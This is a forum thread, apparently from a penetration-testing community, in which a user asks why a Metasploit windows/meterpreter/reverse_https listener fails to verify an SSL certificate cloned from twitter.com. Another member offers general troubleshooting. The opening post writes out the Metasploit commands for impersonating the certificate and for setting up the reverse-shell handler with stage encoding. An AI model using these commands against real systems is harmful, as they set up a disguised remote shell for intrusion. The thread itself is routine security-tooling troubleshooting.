meterpreter/reverse_https certificate

edited March 13 in Exploits

Hello everyone.
I can't run meterpreter/reverse_https with an ssl certificate.

  1. make a copy of the certificate:
    use auxiliary/gather/impersonate_ssl
    set RHOST twitter.com
    run

  2. Launch the listener:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST IP
    set LPORT 8081
    set EnableStageEncoding true
    set StagerVerifySSLCert true
    set HANDLERSSLCERT /root/file.pem
    exploit -j

but after the launch I get this:
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://IP:8081

it should be like this:
msf exploit(handler) > exploit -j
[*] Meterpreter will verify SSL Certificate with SHA1 hash 5fefcc6cae228b92002a6d168c5a78d495d8c884
[*] Exploit running as background job.

I tried using windows/meterpreter/reverse_winhttps, and everything works fine with it.
Please tell me what my mistake is.

Comments

  • hi

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

  • can someone tell me what my mistake is?

  • I've no idea, as I've never tried this msf attack.

    Are you confident it should work with windows/meterpreter/reverse_https ?

  • @TazWake said:

    I've no idea, as I've never tried this msf attack.

    Are you confident it should work with windows/meterpreter/reverse_https ?

    yes, it should have worked with this payload.
    I was guided by this article:
    https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

  • @3TON said:

    yes, it should have worked with this payload.
    I was guided by this article:
    https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

    OK - (and again, I've never used this exploit so I have no idea about it really) but in general, some boxes respond better to one payload than another.

    If you can get it working with windows/meterpreter/reverse_winhttps but not windows/meterpreter/reverse_https then I'd suggest it is down to the payload.

    For example, there was a ticket last year which seems to have been the opposite problem: https://github.com/rapid7/metasploit-framework/issues/14037
